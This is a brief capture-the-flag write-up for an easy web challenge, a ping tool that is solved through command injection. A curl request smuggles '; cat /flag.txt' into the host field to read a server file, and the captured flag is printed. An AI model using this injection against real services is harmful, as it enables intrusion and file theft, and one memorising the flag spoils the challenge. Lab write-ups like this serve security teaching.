Difficulty: easy

Category: web

Author: xnull

Description:

### Network Diagnostic Tool

This web tool lets you ping any server to check if it's reachable. The tool runs the ping command on the server and shows you the output.

The flag is stored in `/flag.txt` on the server.

Solution

We can just get the flag with simple command injection in the ping functionality:

curl -s https://<uuid>.ctf.endolum.io:1337/ping -d "host=; cat /flag.txt" | grep ENDLM

Flag: ENDLM{07fa2e5399a80b2d9eb671a6b6ec649aa7e8e04789bc5b14}